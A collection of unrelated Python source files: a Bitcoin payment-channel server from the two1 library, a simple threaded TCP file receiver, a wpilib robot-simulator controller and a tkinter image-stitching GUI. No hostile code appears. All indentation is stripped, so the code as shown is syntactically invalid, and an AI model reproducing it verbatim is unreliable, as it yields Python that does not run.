signal.signal(signal.SIGINT, sigterm_handler)
try:
processes = []
while True:
start_processes(processes, dbsession)
time.sleep(0.5)
except ExitException:
for p in processes:
p.shutdown()
for p in processes:
p.join()
def usage(argv):
cmd = os.path.basename(argv[0])
print('usage: %s <config_uri>\n'
'(example: "%s production.ini")' % (cmd, cmd))
sys.exit(1)
def main(argv=sys.argv):
if len(argv) != 2:
usage(argv)
config_uri = argv[1]
settings = get_appsettings(config_uri)
engine = get_engine(settings)
session_factory = get_session_factory(engine)
run(session_factory())
if __name__ == '__main__':
main()
|
payment_server.py
|
"""This module implements the server side of payment channels."""
import os
import time
import codecs
import threading
import contextlib
from two1.bitcoin.utils import pack_u32
from two1.bitcoin import Transaction, Hash, Signature, Script
from two1.channels.statemachine import PaymentChannelRedeemScript
from two1.channels.blockchain import TwentyOneBlockchain
from .wallet import Two1WalletWrapper
from .models import DatabaseSQLite3, ChannelSQLite3, Channel
class PaymentServerError(Exception):
"""Generic exception for payment channel processing errors."""
pass
class RedeemPaymentError(PaymentServerError):
"""Raised when the payment server fails to redeem a payment."""
pass
class ChannelClosedError(PaymentServerError):
"""Raised when attempting to access a channel that has been closed."""
pass
class PaymentChannelNotFoundError(PaymentServerError):
"""Raised when attempting to access a channel that does not exist."""
pass
class BadTransactionError(PaymentServerError):
"""Raised when an incorrect or malformed transaction is provided by a client."""
pass
class TransactionVerificationError(PaymentServerError):
"""Raised when the server fails to verify the validity of a transaction."""
pass
class Lock(contextlib.ContextDecorator):
"""An inter-thread lock decorator."""
def __init__(self):
"""Return a new Lock instance."""
self.tlock = threading.Lock()
def __enter__(self):
self.tlock.acquire()
def __exit__(self, exc_type, exc_value, traceback):
self.tlock.release()
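# Illustrative sketch (ours, not part of the two1 package): because Lock derives
# from contextlib.ContextDecorator, a single instance can serialize access either
# as a decorator -- which is how PaymentServer applies its class-level `lock`
# below -- or as a `with` block.
def _lock_usage_sketch():
    guard = Lock()
    @guard
    def critical_section():
        # executes with guard.tlock held; concurrent callers block until release
        return "done"
    return critical_section()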
class PaymentServer:
"""Payment channel handling.
This class handles the server-side implementation of payment channels from
handshake to channel close. It also implements the ability for an API
server to redeem micropayments made within the channel.
"""
DEFAULT_TWENTYONE_BLOCKCHAIN_URL = os.environ.get(
"TWO1_PROVIDER_HOST", "https://blockchain.21.co") + "/blockchain/bitcoin"
"""Default mainnet blockchain URL."""
DEFAULT_TWENTYONE_TESTNET_BLOCKCHAIN_URL = os.environ.get(
"TWO1_PROVIDER_HOST", "https://blockchain.21.co") + "/blockchain/testnet3"
"""Default testnet blockchain URL."""
MIN_TX_FEE = 5000
"""Minimum transaction fee for payment channel deposit/payment."""
DUST_LIMIT = 3000
"""Minimum payment amount (dust limit) for any transaction output."""
MIN_EXP_TIME = 12 * 3600
"""Minimum expiration time (in sec) for a payment channel refund."""
EXP_TIME_BUFFER = 4 * 3600
"""Buffer time before expiration (in sec) in which to broadcast payment."""
PROTOCOL_VERSION = 2
"""Payment channel protocol version."""
lock = Lock()
"""Thread and process lock for database access."""
def __init__(self, wallet, db=None, account='default', testnet=False,
blockchain=None, zeroconf=False, sync_period=600, db_dir=None):
"""Initalize the payment server.
Args:
wallet (.wallet.Two1WalletWrapper): a two1 wallet wrapped with
payment server functionality.
db (.models.ChannelDataManager): a database wrapper to manage the
payment channel server's interface with a persistent store of
data.
account (string): which account within the wallet to use (e.g.
'merchant', 'customer', 'default', etc).
testnet (boolean): whether or not the server should broadcast and
verify transactions against the bitcoin testnet blockchain.
blockchain (two1.blockchain.provider): a blockchain data
provider capable of broadcasting raw transactions.
zeroconf (boolean): whether or not to use a payment channel before
the deposit transaction has been confirmed by the network.
sync_period (integer): how often to sync channel status (in sec).
"""
self.zeroconf = zeroconf
self._wallet = Two1WalletWrapper(wallet, account)
self._blockchain = blockchain
self._db = db
if db is None:
self._db = DatabaseSQLite3(db_dir=db_dir)
if blockchain is None:
self._blockchain = TwentyOneBlockchain(
PaymentServer.DEFAULT_TWENTYONE_BLOCKCHAIN_URL if not self._wallet._wallet.testnet else
PaymentServer.DEFAULT_TWENTYONE_TESTNET_BLOCKCHAIN_URL)
self._sync_stop = threading.Event()
self._sync_thread = threading.Thread(target=self._auto_sync, args=(sync_period, self._sync_stop), daemon=True)
self._sync_thread.start()
def identify(self):
"""Query the payment server's merchant information and server configuration.
Returns:
(dict): a key-value store that contains the merchant's public key and other custom config.
"""
return dict(public_key=self._wallet.get_public_key(),
version=self.PROTOCOL_VERSION,
zeroconf=self.zeroconf)
@lock
def open(self, deposit_tx, redeem_script):
"""Open a payment channel.
Args:
deposit_tx (string): signed deposit transaction which pays to a
2 of 2 multisig script hash.
redeem_script (string): the redeem script that comprises the script
hash so that the merchant can verify.
Returns:
(string): deposit transaction id
"""
# Parse payment channel `open` parameters
deposit_tx = Transaction.from_hex(deposit_tx)
redeem_script = PaymentChannelRedeemScript.from_bytes(codecs.decode(redeem_script, 'hex_codec'))
# Verify that the deposit pays to the redeem script
output_index = deposit_tx.output_index_for_address(redeem_script.hash160())
if output_index is None:
raise BadTransactionError('Deposit does not pay to the provided script hash.')
# Parse payment channel data for open
deposit_txid = str(deposit_tx.hash)
merch_pubkey = codecs.encode(redeem_script.merchant_public_key.compressed_bytes, 'hex_codec').decode()
amount = deposit_tx.outputs[output_index].value
# Verify that one of the public keys belongs to the merchant
valid_merchant_public_key = self._wallet.validate_merchant_public_key(redeem_script.merchant_public_key)
if not valid_merchant_public_key:
raise BadTransactionError('Public key does not belong to the merchant.')
# Verify that the deposit is not already part of a payment channel
if self._db.pc.lookup(deposit_txid):
raise BadTransactionError('That deposit has already been used to create a channel.')
# Verify that the lock time is an allowable amount in the future
minimum_locktime = int(time.time()) + self.MIN_EXP_TIME
if redeem_script.expiration_time < minimum_locktime:
raise TransactionVerificationError('Transaction locktime must be further in the future.')
# Open and save the payment channel
self._db.pc.create(deposit_tx, merch_pubkey, amount, redeem_script.expiration_time)
# Set the channel to `ready` if zeroconf is enabled
if self.zeroconf:
self._db.pc.update_state(deposit_txid, ChannelSQLite3.READY)
return str(deposit_tx.hash)
@lock
def receive_payment(self, deposit_txid, payment_tx):
"""Receive and process a payment within the channel.
The customer makes a payment in the channel by sending the merchant a
half-signed payment transaction. The merchant signs the other half of
the transaction and saves it in its records (but does not broadcast it
or send it to the customer). The merchant responds with 200 to verify
that the payment was handled successfully.
Args:
deposit_txid (string): string representation of the deposit
transaction hash. This is used to look up the payment channel.
payment_tx (string): half-signed payment transaction from a
customer.
Returns:
(string): payment transaction id
"""
# Parse payment channel `payment` parameters
payment_tx = Transaction.from_hex(payment_tx)
# Get channel and addresses related to the deposit
channel = self._db.pc.lookup(deposit_txid)
if not channel:
raise PaymentChannelNotFoundError('Related channel not found.')
# Get merchant public key information from payment channel
redeem_script = PaymentChannelRedeemScript.from_bytes(payment_tx.inputs[0].script[-1])
merch_pubkey = redeem_script.merchant_public_key
# Verify that the payment has a valid signature from the customer
txn_copy = payment_tx._copy_for_sig(0, Transaction.SIG_HASH_ALL, redeem_script)
msg_to_sign = bytes(Hash.dhash(bytes(txn_copy) + pack_u32(Transaction.SIG_HASH_ALL)))
sig = Signature.from_der(payment_tx.inputs[0].script[0][:-1])
if not redeem_script.customer_public_key.verify(msg_to_sign, sig, False):
raise BadTransactionError('Invalid payment signature.')
# Verify the length of the script is what we expect
if len(payment_tx.inputs[0].script) != 3:
raise BadTransactionError('Invalid payment channel transaction structure.')
# Verify the script template is valid for accepting a merchant signature
if (not Script.validate_template(payment_tx.inputs[0].script, [bytes, 'OP_1', bytes]) and
not Script.validate_template(payment_tx.inputs[0].script, [bytes, 'OP_TRUE', bytes])):
raise BadTransactionError('Invalid payment channel transaction structure.')
# Verify that the payment channel is ready
if channel.state == ChannelSQLite3.CONFIRMING:
confirmed = self._blockchain.check_confirmed(channel.deposit_txid)
if confirmed:
self._db.pc.update_state(channel.deposit_txid, ChannelSQLite3.READY)
else:
raise ChannelClosedError('Payment channel not ready.')
elif channel.state == ChannelSQLite3.CLOSED:
raise ChannelClosedError('Payment channel closed.')
# Verify that payment is made to the merchant's pubkey
index = payment_tx.output_index_for_address(merch_pubkey.hash160())
if index is None:
raise BadTransactionError('Payment must pay to merchant pubkey.')
# Verify that both payments are not below the dust limit
for output_index, output in enumerate(payment_tx.outputs):
if output.value < PaymentServer.DUST_LIMIT:
# Payment to merchant is less than dust limit
if output_index == index:
raise BadTransactionError(
'Initial payment must be greater than {}.'.format(PaymentServer.DUST_LIMIT))
# Payment to customer is less than dust limit
else:
raise BadTransactionError(
'Payment channel balance is not large enough to make payment.')
# Validate that the payment is more than the last one
new_pmt_amt = payment_tx.outputs[index].value
if new_pmt_amt <= channel.last_payment_amount:
raise BadTransactionError('Payment must be greater than 0.')
# Verify that the transaction has adequate fees
net_pmt_amount = sum([d.value for d in payment_tx.outputs])
deposit_amount = channel.amount
if deposit_amount < net_pmt_amount + PaymentServer.MIN_TX_FEE:
raise BadTransactionError('Payment must have adequate fees.')
# Update the current payment transaction
self._db.pc.update_payment(deposit_txid, payment_tx, new_pmt_amt)
self._db.pmt.create(deposit_txid, payment_tx, new_pmt_amt - channel.last_payment_amount)
return str(payment_tx.hash)
def status(self, deposit_txid):
"""Get a payment channel's current status.
Args:
deposit_txid (string): string representation of the deposit
transaction hash. This is used to look up the payment channel.
"""
channel = self._db.pc.lookup(deposit_txid)
if not channel:
raise PaymentChannelNotFoundError('Related channel not found.')
return dict(status=channel.state,
balance=channel.last_payment_amount,
time_left=channel.expires_at)
@lock
def close(self, deposit_txid, deposit_txid_signature):
"""Close a payment channel.
Args:
deposit_txid (string): string representation of the deposit
transaction hash. This is used to look up the payment channel.
deposit_txid_signature (two1.bitcoin.Signature): a signature
consisting solely of the deposit_txid to verify the
authenticity of the close request.
"""
channel = self._db.pc.lookup(deposit_txid)
# Verify that the requested channel exists
if not channel:
raise PaymentChannelNotFoundError('Related channel not found.')
# Parse payment channel `close` parameters
try:
signature_der = codecs.decode(deposit_txid_signature, 'hex_codec')
deposit_txid_signature = Signature.from_der(signature_der)
except TypeError:
raise TransactionVerificationError('Invalid signature provided.')
# Verify that there is a valid payment to close
if not channel.payment_tx:
raise BadTransactionError('No payments made in channel.')
# Verify that the user is authorized to close the channel
payment_tx = channel.payment_tx
redeem_script = PaymentChannelRedeemScript.from_bytes(payment_tx.inputs[0].script[-1])
sig_valid = redeem_script.customer_public_key.verify(
deposit_txid.encode(), deposit_txid_signature)
if not sig_valid:
raise TransactionVerificationError('Invalid signature.')
# Sign the final transaction
self._wallet.sign_half_signed_payment(payment_tx, redeem_script)
# Broadcast payment transaction to the blockchain
self._blockchain.broadcast_tx(payment_tx.to_hex())
# Record the broadcast in the database
self._db.pc.update_state(deposit_txid, ChannelSQLite3.CLOSED)
return str(payment_tx.hash)
@lock
def redeem(self, payment_txid):
"""Determine the validity and amount of a payment.
Args:
payment_txid (string): the hash in hexadecimal of the payment
transaction, often referred to as the transaction id.
Returns:
pmt_amount (int): value in satoshis of the incremental payment.
Raises:
            PaymentServerError: reason why the payment is not redeemable.
"""
# Verify that we have this payment transaction saved
payment = self._db.pmt.lookup(payment_txid)
if not payment:
raise PaymentChannelNotFoundError('Payment not found.')
# Verify that this payment exists within a channel
channel = self._db.pc.lookup(payment.deposit_txid)
if not channel:
raise PaymentChannelNotFoundError('Channel not found.')
# Verify that the payment channel is ready
if channel.state == ChannelSQLite3.CONFIRMING:
raise ChannelClosedError('Payment channel not ready.')
elif channel.state == ChannelSQLite3.CLOSED:
raise ChannelClosedError('Payment channel closed.')
# Calculate and redeem the current payment
redeem_success = self._db.pmt.redeem(payment_txid)
# Verify that the payment has not already been redeemed
if not redeem_success:
raise RedeemPaymentError('Payment already redeemed.')
return payment.amount
@lock
def sync(self):
"""Sync the state of all payment channels."""
# Look up all channels
channel_query = self._db.pc.lookup()
# Check whether the return result is a single Channel or list
if isinstance(channel_query, Channel):
payment_channels = [channel_query]
else:
payment_channels = channel_query
# Return if there are no payment channels to sync
if not payment_channels:
return
for pc in payment_channels:
# Skip sync if channel is closed
if pc.state == ChannelSQLite3.CLOSED:
continue
# Check for deposit confirmation
if pc.state == ChannelSQLite3.CONFIRMING and self._blockchain.check_confirmed(pc.deposit_txid):
self._db.pc.update_state(pc.deposit_txid, ChannelSQLite3.READY)
# Check if channel got closed
if pc.state in (ChannelSQLite3.CONFIRMING, ChannelSQLite3.READY) and pc.payment_tx:
redeem_script = PaymentChannelRedeemScript.from_bytes(pc.payment_tx.inputs[0].script[-1])
deposit_tx_utxo_index = pc.deposit_tx.output_index_for_address(redeem_script.hash160())
spend_txid = self._blockchain.lookup_spend_txid(pc.deposit_txid, deposit_tx_utxo_index)
if spend_txid:
self._db.pc.update_state(pc.deposit_txid, ChannelSQLite3.CLOSED)
# Check for channel expiration
if pc.state != ChannelSQLite3.CLOSED:
if time.time() + PaymentServer.EXP_TIME_BUFFER > pc.expires_at and pc.payment_tx:
redeem_script = PaymentChannelRedeemScript.from_bytes(pc.payment_tx.inputs[0].script[-1])
self._wallet.sign_half_signed_payment(pc.payment_tx, redeem_script)
self._blockchain.broadcast_tx(pc.payment_tx.to_hex())
self._db.pc.update_payment(pc.deposit_txid, pc.payment_tx, pc.last_payment_amount)
self._db.pc.update_state(pc.deposit_txid, ChannelSQLite3.CLOSED)
def _auto_sync(self, timeout, stop_event):
"""Lightweight thread for automatic channel syncs."""
while not stop_event.is_set():
stop_event.wait(timeout)
self.sync()
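# --- Usage sketch (illustrative only, not part of the original module) ---
# A minimal server-side flow, assuming a funded two1 wallet instance and
# hex-encoded transactions supplied by a payment-channel client. The names
# wallet, deposit_tx_hex, redeem_script_hex, payment_tx_hex and
# deposit_txid_signature_hex below are hypothetical placeholders.
#
#     server = PaymentServer(wallet, zeroconf=True)
#     deposit_txid = server.open(deposit_tx_hex, redeem_script_hex)        # handshake
#     payment_txid = server.receive_payment(deposit_txid, payment_tx_hex)  # micropayment
#     amount = server.redeem(payment_txid)       # credit the API call with `amount` satoshis
#     server.close(deposit_txid, deposit_txid_signature_hex)               # broadcast & close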
|
server.py
|
import socket
import threading
import time
header = 64
port = 5000
disconnect_msg = b'quit'
SERVER = '10.0.0.3'
Address = (SERVER, port)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(Address)
server.setblocking(True)
def handle(con, adr):
print(f"[New Connection] {adr} connected.")
connected = True
f = None
first = False
length = None
start_time = None
while connected:
length = con.recv(header)
if not length:
break
if not start_time:
start_time = time.time()
ind = length.find(b' ')
length = int(length[:ind])
print(f"{length} Bytes")
reading = True
while reading and length != 0:
if f:
msg = con.recv(1024)
else:
msg = con.recv(length)
if not msg:
connected = False
break
if msg == b'small':
f = open('small_of_' + adr[0] + '.txt', 'bw')
first = True
elif msg == b'medium':
f = open('medium_of_' + adr[0] + '.mp3', 'bw')
first = True
elif msg == b'huge':
f = open('huge_of_' + adr[0] + '.mp4', 'bw')
first = True
else:
f.write(msg)
if first:
reading = False
first = False
con.close()
if f:
print("Message received in %s milliseconds\n" % int((time.time() - start_time)*1000))
f.close()
def start():
print(f"Listening on {SERVER}\n")
server.listen()
while True:
con, adr = server.accept()
thread = threading.Thread(target=handle, args=(con, adr))
thread.start()
print(f"[Active connections] {threading.activeCount() - 1}")
start()
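# --- Client sketch (illustrative only; reflects one reading of the protocol above) ---
# Per transfer the server expects a 64-byte header containing the ASCII length of the
# next message followed by a space, then a size-class marker (b'small', b'medium' or
# b'huge'), then a second header and the raw file bytes, with the client closing the
# connection once the file has been sent. `send_file` below is a hypothetical helper.
#
#     def send_file(path, size_class=b'small', host=SERVER, server_port=port):
#         with open(path, 'rb') as fh, socket.create_connection((host, server_port)) as s:
#             s.sendall(str(len(size_class)).encode().ljust(header, b' '))
#             s.sendall(size_class)
#             data = fh.read()
#             s.sendall(str(len(data)).encode().ljust(header, b' '))
#             s.sendall(data)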
|
robot_controller.py
|
'''
This manages the active state of the robot
'''
import sys
import threading
import time
from ..wpilib import _wpilib
from .sim_manager import SimManager
class RobotController(object):
mode_map = {
SimManager.MODE_AUTONOMOUS: "Autonomous",
SimManager.MODE_DISABLED: "Disabled",
SimManager.MODE_OPERATOR_CONTROL: "OperatorControl"
}
def __init__(self, myrobot):
self.mode = SimManager.MODE_DISABLED
self.mode_callback = None
self.myrobot = myrobot
# attach to the robot
_wpilib.internal.on_IsEnabled = self.on_IsEnabled
_wpilib.internal.on_IsAutonomous = self.on_IsAutonomous
_wpilib.internal.on_IsOperatorControl = self.on_IsOperatorControl
# any data shared with the ui must be protected by
# this since it's running in a different thread
self._lock = threading.RLock()
self.thread = threading.Thread(target=self._robot_thread)
self.thread.daemon = True
def run(self):
self._run_code = True
self.thread.start()
def stop(self):
with self._lock:
self._run_code = False
# if the robot code is spinning in any of the modes, then
# we need to change the mode so it returns back to us
if self.mode == SimManager.MODE_DISABLED:
self.mode = SimManager.MODE_OPERATOR_CONTROL
else:
self.mode = SimManager.MODE_DISABLED
# resume the robot just in case it's hung somewhere
_wpilib._fake_time.FAKETIME.Resume()
try:
self.thread.join(timeout=5.0)
except RuntimeError:
return False
return not self.thread.is_alive()
#
# API used by the ui
#
def is_alive(self):
return self.thread.is_alive()
def on_mode_change(self, callable):
'''When the robot mode changes, call the function with the mode'''
with self._lock:
self.mode_callback = callable
def set_joystick(self, x, y):
'''
Receives joystick values from the ui
'''
with self._lock:
drive_stick = self.driver_station.sticks[0]
drive_stick[1] = x
drive_stick[2] = y
def set_mode(self, mode):
if mode not in [SimManager.MODE_DISABLED,
SimManager.MODE_AUTONOMOUS,
SimManager.MODE_OPERATOR_CONTROL]:
raise ValueError("Invalid value for mode: %s" % mode)
with self._lock:
# TODO: need a way to notify the caller that the set failed. Perhaps an exception?
if not self.is_alive():
return
old_mode = self.mode
self.mode = mode
callback = self.mode_callback
# don't call from inside the lock
if old_mode != mode and callback is not None:
callback(mode)
def get_mode(self):
with self._lock:
return self.mode
#
# Runs the code
#
def _check_sleep(self, idx):
'''This ensures that the robot code called Wait() at some point'''
# TODO: There are some cases where it would be ok to do this...
if not _wpilib._fake_time.FAKETIME.slept[idx]:
errstr = '%s() function is not calling wpilib.Wait() in its loop!' % self.mode_map[self.mode]
raise RuntimeError(errstr)
_wpilib._fake_time.FAKETIME.slept[idx] = False
def on_IsEnabled(self):
with self._lock:
self._check_sleep(0)
return self.mode != SimManager.MODE_DISABLED
def on_IsAutonomous(self, tm):
with self._lock:
self._check_sleep(1)
if not self._run_code:
return False
return self.mode == SimManager.MODE_AUTONOMOUS
def on_IsOperatorControl(self, tm):
with self._lock:
self._check_sleep(2)
if not self._run_code:
return False
return self.mode == SimManager.MODE_OPERATOR_CONTROL
def on_WatchdogError(self, last_fed, period, expiration):
print('WATCHDOG FAILURE! Last fed %0.3f seconds ago (expiration: %0.3f seconds)' %
(period, expiration), file=sys.stderr)
self.set_mode(SimManager.MODE_DISABLED)
def _robot_thread(self):
# setup things for the robot
self.driver_station = _wpilib.DriverStation.GetInstance()
self.myrobot.watchdog.error_handler = self.on_WatchdogError
last_mode = None
try:
while True:
with self._lock:
mode = self.mode
if not self._run_code:
break
# Detect if the code is implemented improperly
# -> This error occurs if the robot returns from one of its
# functions for any reason other than a mode change, as
# this is the only acceptable reason for this to occur
if last_mode is not None:
if last_mode == mode and mode != SimManager.MODE_DISABLED:
                        errstr = '%s() function returned before the mode changed' % self.mode_map[last_mode]
raise RuntimeError(errstr)
# reset this, just in case
_wpilib._fake_time.FAKETIME.slept = [True]*3
if last_mode != mode:
if mode == SimManager.MODE_DISABLED:
self.myrobot.Disabled()
elif mode == SimManager.MODE_AUTONOMOUS:
self.myrobot.Autonomous()
elif mode == SimManager.MODE_OPERATOR_CONTROL:
self.myrobot.OperatorControl()
# make sure infinite loops don't kill the processor...
time.sleep(0.001)
last_mode = mode
finally:
self.myrobot.GetWatchdog().SetEnabled(False)
self.set_mode(SimManager.MODE_DISABLED)
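# --- Usage sketch (illustrative only, not part of the original module) ---
# How a UI layer might drive the controller; `MyRobot` stands in for whatever
# wpilib robot class the simulator loads and is purely hypothetical here.
#
#     controller = RobotController(MyRobot())
#     controller.on_mode_change(lambda mode: print("mode is now", mode))
#     controller.run()                                  # start the robot thread
#     controller.set_mode(SimManager.MODE_AUTONOMOUS)   # switch modes from the UI
#     ...
#     controller.stop()                                 # returns False if the thread hung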
|
gui.py
|
from pathlib import Path
import tkinter as tk
import tkinter.messagebox
import tkinter.filedialog
from tkinter.scrolledtext import ScrolledText
import _tkinter
import time
import logging
import threading
import queue
import tkinter.font as font
from stitch_MAPS_annotations import Stitcher
from sites_of_interest_parser import MapsXmlParser
# TODO: Figure out how to run pyimagej and tkinter at the same time on Macs, see suggestions here:
# https://github.com/imagej/pyimagej/issues/39
# import imagej
# ij = imagej.init('/Applications/Fiji.app')
class QueueHandler(logging.Handler):
"""Class that accepts logs and adds them to a queue
"""
# Based on: https://github.com/beenje/tkinter-logging-text-widget
def __init__(self, logging_queue):
super().__init__()
self.logging_queue = logging_queue
def emit(self, log_statement):
self.logging_queue.put(log_statement)
class LoggingWindow:
# Based on: https://github.com/beenje/tkinter-logging-text-widget
def __init__(self, master):
self.master = master
self.scrolled_text = ScrolledText(master=master, state='disabled', height=15)
self.scrolled_text.grid(row=0, column=0)
self.scrolled_text.configure(font='TkFixedFont')
self.scrolled_text.tag_config('INFO', foreground='black')
self.scrolled_text.tag_config('DEBUG', foreground='gray')
self.scrolled_text.tag_config('WARNING', foreground='orange')
self.scrolled_text.tag_config('ERROR', foreground='red')
# Get the logger
self.logger = logging.getLogger()
self.log_queue = queue.Queue()
self.queue_handler = QueueHandler(self.log_queue)
formatter = logging.Formatter('%(asctime)s : %(levelname)s : %(message)s')
self.queue_handler.setFormatter(formatter)
self.logger.addHandler(self.queue_handler)
# Start polling messages from the queue
self.master.after(100, self.poll_log_queue)
self.autoscroll = tk.BooleanVar()
tk.Checkbutton(master, text='Autoscroll Log', variable=self.autoscroll).\
grid(row=1, column=0, sticky=tk.W)
self.autoscroll.set(True)
def display(self, record):
msg = self.queue_handler.format(record)
self.scrolled_text.configure(state='normal')
self.scrolled_text.insert(tk.END, msg + '\n', record.levelname)
self.scrolled_text.configure(state='disabled')
# Autoscroll to the bottom
if self.autoscroll.get():
self.scrolled_text.yview(tk.END)
def poll_log_queue(self):
# Check every 100ms if there is a new message in the queue to display
while True:
try:
record = self.log_queue.get(block=False)
except queue.Empty:
break
else:
self.display(record)
self.master.after(100, self.poll_log_queue)
class Gui:
def __init__(self, master):
self.master = master
frame = tk.Frame(master)
self.font = font.Font()
# ***** Menu *****
menu = tk.Menu(master)
master.config(menu=menu)
file_menu = tk.Menu(menu)
edit_menu = tk.Menu(menu)
menu.add_cascade(label='File', menu=file_menu)
# file_menu.add_separator()
file_menu.add_command(label='Quit', command=frame.quit)
menu.add_cascade(label='Edit', menu=edit_menu)
edit_menu.add_command(label='Reset to default', command=self.reset_parameters)
# ***** User Inputs *****
file_picker_label = tk.Label(master, text='Project folder:')
self.project_path = tk.StringVar()
self.file_picker_entry = tk.Entry(master, textvariable=self.project_path, width=30)
file_picker_button = tk.Button(master, text='Choose Directory', command=self.ask_for_path)
file_picker_label.grid(row=0, column=0, sticky=tk.E, pady=(10, 0), padx=(25,5))
self.file_picker_entry.grid(row=0, column=1, sticky=tk.W, pady=(10, 0))
file_picker_button.grid(row=0, column=2, sticky=tk.W, pady=(10, 0))
self.classifier_input = tk.BooleanVar()
tk.Checkbutton(master, text='Load input from classifier', variable=self.classifier_input,
command=self.display_csv_picker).grid(row=1, column=1, pady=(6, 0), sticky=tk.W)
self.csv_picker_label = tk.Label(master, text='Classifier CSV file:')
self.csv_path = tk.StringVar()
self.csv_picker_entry = tk.Entry(master, textvariable=self.csv_path, width=30)
self.csv_picker_button = tk.Button(master, text='Choose CSV file', command=self.ask_for_file)
grid_pos = 4
tk.Label(master, text='Advanced Options', font=(self.font, 14, 'bold')).grid(row=grid_pos, column=1,
pady=(20, 0), sticky=tk.W)
# TODO: Find out how to hide advanced options by default
self.output_folder = tk.StringVar()
tk.Label(master, text='Output folder name images:').grid(row=grid_pos + 1, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.output_folder).grid(row=grid_pos + 1, column=1, sticky=tk.W)
self.csv_folder_name = tk.StringVar()
tk.Label(master, text='Output folder name CSVs:').grid(row=grid_pos + 2, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.csv_folder_name).grid(row=grid_pos + 2, column=1, sticky=tk.W)
self.max_processes = tk.IntVar()
tk.Label(master, text='Number of parallel processes:').grid(row=grid_pos + 3, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.max_processes).grid(row=grid_pos + 3, column=1, sticky=tk.W)
self.batch_size = tk.IntVar()
tk.Label(master, text='Batch size:').grid(row=grid_pos + 4, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.batch_size).grid(row=grid_pos + 4, column=1, sticky=tk.W)
self.highmag_layer = tk.StringVar()
tk.Label(master, text='MAPS high magnification layer:').grid(row=grid_pos + 5, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.highmag_layer).grid(row=grid_pos + 5, column=1, sticky=tk.W)
self.stitch_threshold = tk.IntVar()
tk.Label(master, text='Stitch threshold:').grid(row=grid_pos + 6, column=0, sticky=tk.E, padx=(25,5))
tk.Entry(master, textvariable=self.stitch_threshold).grid(row=grid_pos + 6, column=1, sticky=tk.W)
self.eight_bit = tk.BooleanVar()
tk.Checkbutton(master, text='8 bit output', variable=self.eight_bit).grid(row=grid_pos + 7, column=1, sticky=tk.W)
self.arrow_overlay = tk.BooleanVar()
tk.Checkbutton(master, text='Add an arrow overlay that points to the fork', variable=self.arrow_overlay). \
grid(row=grid_pos + 8, column=1, sticky=tk.W)
self.contrast_enhance = tk.BooleanVar()
tk.Checkbutton(master, text='Produce contrast enhanced images', variable=self.contrast_enhance). \
grid(row=grid_pos + 9, column=1, sticky=tk.W)
self.continue_processing = tk.BooleanVar()
tk.Checkbutton(master, text='Continue processing an experiment', variable=self.continue_processing).\
grid(row=grid_pos + 10, column=1, sticky=tk.W)
# Run button
self.run_button_text = tk.StringVar()
self.run_button = tk.Button(master, textvariable=self.run_button_text, width=10)
self.run_button_ready()
self.run_button.grid(row=15, column=2, sticky=tk.W, pady=10, padx=10)
# Reset button
self.reset_button = tk.Button(master, text='Reset Parameters', width=20, command=self.reset_parameters)
self.reset_button.grid(row=15, column=0, sticky=tk.E, pady=10, padx=10)
        # Initialize all inputs with their default values
        self.reset_parameters()
def reset_parameters(self):
self.project_path.set('')
self.max_processes.set(5)
self.eight_bit.set(True)
self.batch_size.set(5)
self.output_folder.set('stitchedForks')
self.csv_folder_name.set('annotations')
self.highmag_layer.set('highmag')
self.stitch_threshold.set(1000)
self.arrow_overlay.set(True)
self.contrast_enhance.set(True)
self.continue_processing.set(False)
self.classifier_input.set(False)
self.csv_path.set('')
def run(self):
project_dir = Path(self.project_path.get())
base_path = project_dir.parent
project_name = project_dir.name
params_set = self.check_all_parameters_set()
if params_set and not self.continue_processing.get() and not self.classifier_input.get():
self.create_logging_window()
self.run_button_to_running()
log_file_path = str(Path(project_dir) / (project_name + '.log'))
logger = MapsXmlParser.create_logger(log_file_path)
logger.info('Process experiment {}'.format(project_name))
# thread = threading.Thread(target=self.dummy, args=(10, ))
# thread.daemon = True
# thread.start()
thread = threading.Thread(target=self.run_from_beginning, args=(base_path, project_name,))
thread.daemon = True
thread.start()
elif params_set and self.continue_processing.get():
self.create_logging_window()
self.run_button_to_running()
logging.info('Continuing to process experiment {}'.format(project_name))
thread = threading.Thread(target=self.continue_run, args=(base_path, project_name,))
thread.daemon = True
thread.start()
elif params_set and self.classifier_input.get():
self.create_logging_window()
self.run_button_to_running()
logging.info('Load classifier output for experiment {} from the csv file: {}'.format(project_name,
self.csv_path.get()))
thread = threading.Thread(target=self.classifier_input_run, args=(base_path, project_name,
self.csv_path.get(),))
thread.daemon = True
thread.start()
else:
tkinter.messagebox.showwarning(title='Warning: parameters missing',
message='You need to enter the correct kind of parameters in all the '
'required fields and then try again')
def run_button_to_running(self):
self.run_button_text.set('Running...')
self.run_button.config(height=2, fg='gray', command=self.nothing)
def run_button_ready(self):
self.run_button_text.set('Run')
self.run_button.config(height=2, fg='green', command=self.run, font=(self.font, 24, 'bold'))
def run_from_beginning(self, base_path, project_name):
# TODO: Catch issues when wrong path is provided or another error/warning occurs in the stitcher => catch my custom Exception, display it to the user
stitcher = Stitcher(base_path, project_name, self.csv_folder_name.get(), self.output_folder.get())
stitcher.parse_create_csv_batches(batch_size=self.batch_size.get(), highmag_layer=self.highmag_layer.get())
stitcher.manage_batches(self.stitch_threshold.get(), self.eight_bit.get(), show_arrow=self.arrow_overlay.get(),
max_processes=self.max_processes.get(), enhance_contrast=self.contrast_enhance.get())
stitcher.combine_csvs(delete_batches=True)
logging.info('Finished processing the experiment')
self.run_button_ready()
def continue_run(self, base_path, project_name):
stitcher = Stitcher(base_path, project_name, self.csv_folder_name.get(), self.output_folder.get())
stitcher.manage_batches(self.stitch_threshold.get(), self.eight_bit.get(), show_arrow=self.arrow_overlay.get(),
max_processes=self.max_processes.get(), enhance_contrast=self.contrast_enhance.get())
stitcher.combine_csvs(delete_batches=True)
logging.info('Finished processing the experiment')
self.run_button_ready()
def classifier_input_run(self, base_path, project_name, csv_path):
stitcher = Stitcher(base_path, project_name, self.csv_folder_name.get(), self.output_folder.get())
stitcher.parse_create_classifier_csv_batches(batch_size=self.batch_size.get(), classifier_csv_path=csv_path,
highmag_layer=self.highmag_layer.get())
